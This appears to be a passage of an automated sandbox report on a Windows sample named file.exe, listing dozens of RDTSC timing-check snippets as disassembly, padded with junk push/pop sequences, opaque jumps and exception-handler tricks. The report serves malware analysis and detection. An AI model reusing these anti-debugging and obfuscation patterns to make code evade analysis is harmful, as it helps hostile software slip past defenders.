              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779020 second address: 77902D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4F3C50B5EFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDA5 second address: 77CDB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4F3CC87F76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDB0 second address: 77CDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDB8 second address: 77CDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4F3CC87F7Bh 0x0000000b jns 00007F4F3CC87F76h 0x00000011 jmp 00007F4F3CC87F7Ah 0x00000016 jmp 00007F4F3CC87F84h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDF5 second address: 77CDFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDFA second address: 77CE06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4F3CC87F76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CE06 second address: 77CE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DCB1 second address: 77DCD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jne 00007F4F3CC87F76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F7F7 second address: 77F803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F4F3C50B5D6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F803 second address: 77F807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78510E second address: 785116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785116 second address: 785120 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F3CC87F76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785120 second address: 78512A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78585F second address: 785879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F4F3CC87F76h 0x0000000d jp 00007F4F3CC87F76h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785879 second address: 78587D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78587D second address: 785891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 js 00007F4F3CC87F76h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7859F1 second address: 785A06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785A06 second address: 785A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jng 00007F4F3CC87F76h 0x00000014 jnl 00007F4F3CC87F76h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785A24 second address: 785A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7864BC second address: 7864ED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4F3CC87F87h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 11DF0CA8h 0x00000011 and di, 671Fh 0x00000016 push 8646AD5Dh 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7864ED second address: 7864F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786755 second address: 786759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786759 second address: 78675D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78675D second address: 786763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786763 second address: 786769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786769 second address: 78676D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78676D second address: 786771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78691B second address: 786921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787018 second address: 787022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4F3C50B5D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7870A3 second address: 7870A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7870A9 second address: 7870B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4F3C50B5D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787229 second address: 78723F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78723F second address: 787260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787260 second address: 787264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78768C second address: 7876BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4F3C50B5DDh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4F3C50B5E7h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7876BD second address: 7876DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787B2F second address: 787B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789D40 second address: 789D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789D44 second address: 789D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A76D second address: 78A771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AA12 second address: 78AA26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C975 second address: 78C979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F332 second address: 78F33C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4F3C50B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C719 second address: 78C71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D0A3 second address: 78D0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4F3C50B5E2h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D0BF second address: 78D0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C71D second address: 78C723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F7E3 second address: 78F7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F7ED second address: 78F7F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790831 second address: 790843 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F3CC87F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4F3CC87F76h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790956 second address: 79096F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E4h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792953 second address: 7929DF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F3CC87F78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F4F3CC87F78h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov bx, si 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F4F3CC87F78h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 call 00007F4F3CC87F81h 0x0000004b xor dword ptr [ebp+122D2694h], ecx 0x00000051 pop edi 0x00000052 push 00000000h 0x00000054 xchg eax, esi 0x00000055 jmp 00007F4F3CC87F7Bh 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jbe 00007F4F3CC87F7Ch 0x00000063 ja 00007F4F3CC87F76h 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791A81 second address: 791A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791B4E second address: 791B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792B75 second address: 792B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792B79 second address: 792B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796852 second address: 796857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796857 second address: 79687C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 ja 00007F4F3CC87F7Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F4F3CC87F7Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7948FA second address: 79490D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DEh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79687C second address: 796893 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F4F3CC87F7Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79490D second address: 7949A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, 68337C57h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 stc 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F4F3C50B5D8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D1BD6h], ecx 0x00000040 mov edi, dword ptr [ebp+122D3979h] 0x00000046 mov eax, dword ptr [ebp+122D1045h] 0x0000004c pushad 0x0000004d mov eax, ecx 0x0000004f popad 0x00000050 push FFFFFFFFh 0x00000052 jnp 00007F4F3C50B5D9h 0x00000058 call 00007F4F3C50B5E5h 0x0000005d jmp 00007F4F3C50B5DFh 0x00000062 pop edi 0x00000063 push eax 0x00000064 pushad 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7949A5 second address: 7949AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798FA9 second address: 798FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798FAF second address: 798FD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798FD5 second address: 798FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798FDA second address: 798FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79AF11 second address: 79AF2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B128 second address: 79B1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D2549h], edx 0x0000000e mov dword ptr [ebp+122D33F9h], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push ebx 0x0000001c cmc 0x0000001d pop ebx 0x0000001e call 00007F4F3CC87F81h 0x00000023 mov ebx, dword ptr [ebp+122D381Dh] 0x00000029 pop edi 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 sub edi, dword ptr [ebp+122D3352h] 0x00000037 mov eax, dword ptr [ebp+122D0E99h] 0x0000003d mov dword ptr [ebp+122D285Fh], ecx 0x00000043 mov edi, dword ptr [ebp+122D3811h] 0x00000049 push FFFFFFFFh 0x0000004b mov di, E030h 0x0000004f mov bh, ah 0x00000051 nop 0x00000052 pushad 0x00000053 jmp 00007F4F3CC87F7Ah 0x00000058 push eax 0x00000059 push edx 0x0000005a pop edx 0x0000005b pop eax 0x0000005c popad 0x0000005d push eax 0x0000005e pushad 0x0000005f ja 00007F4F3CC87F87h 0x00000065 jnp 00007F4F3CC87F7Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79914B second address: 799154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DED8 second address: 79DEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799154 second address: 799158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799158 second address: 79915C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79915C second address: 7991F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D27ABh], edx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov bx, cx 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007F4F3C50B5D8h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b adc edi, 4F982A68h 0x00000041 mov eax, dword ptr [ebp+122D0E8Dh] 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007F4F3C50B5D8h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 xor dword ptr [ebp+122D1905h], esi 0x00000067 push FFFFFFFFh 0x00000069 adc ebx, 35E600FDh 0x0000006f nop 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F4F3C50B5E3h 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D183 second address: 79D188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D188 second address: 79D18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E0BF second address: 79E0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E0C3 second address: 79E0CD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A169B second address: 7A16A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A16A5 second address: 7A16A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A16A9 second address: 7A16B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A16B8 second address: 7A16BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A16BC second address: 7A16C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1816 second address: 7A1820 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4F3C50B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1820 second address: 7A18E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F4F3CC87F84h 0x0000000d nop 0x0000000e xor dword ptr [ebp+122D21F9h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F4F3CC87F78h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122DB870h], ebx 0x0000003b mov dword ptr [ebp+122D2627h], edx 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 jmp 00007F4F3CC87F7Ah 0x0000004d mov eax, dword ptr [ebp+122D0969h] 0x00000053 push 00000000h 0x00000055 push ecx 0x00000056 call 00007F4F3CC87F78h 0x0000005b pop ecx 0x0000005c mov dword ptr [esp+04h], ecx 0x00000060 add dword ptr [esp+04h], 0000001Ah 0x00000068 inc ecx 0x00000069 push ecx 0x0000006a ret 0x0000006b pop ecx 0x0000006c ret 0x0000006d or dword ptr [ebp+12476619h], edi 0x00000073 call 00007F4F3CC87F7Ah 0x00000078 jmp 00007F4F3CC87F87h 0x0000007d pop ebx 0x0000007e push FFFFFFFFh 0x00000080 sbb bx, 03F8h 0x00000085 push eax 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A18E7 second address: 7A18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A18EB second address: 7A18F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4F3CC87F7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5D4D second address: 7A5D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC3AD second address: 7AC3BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4F3CC87F76h 0x0000000a jnl 00007F4F3CC87F76h 0x00000010 rdtsc
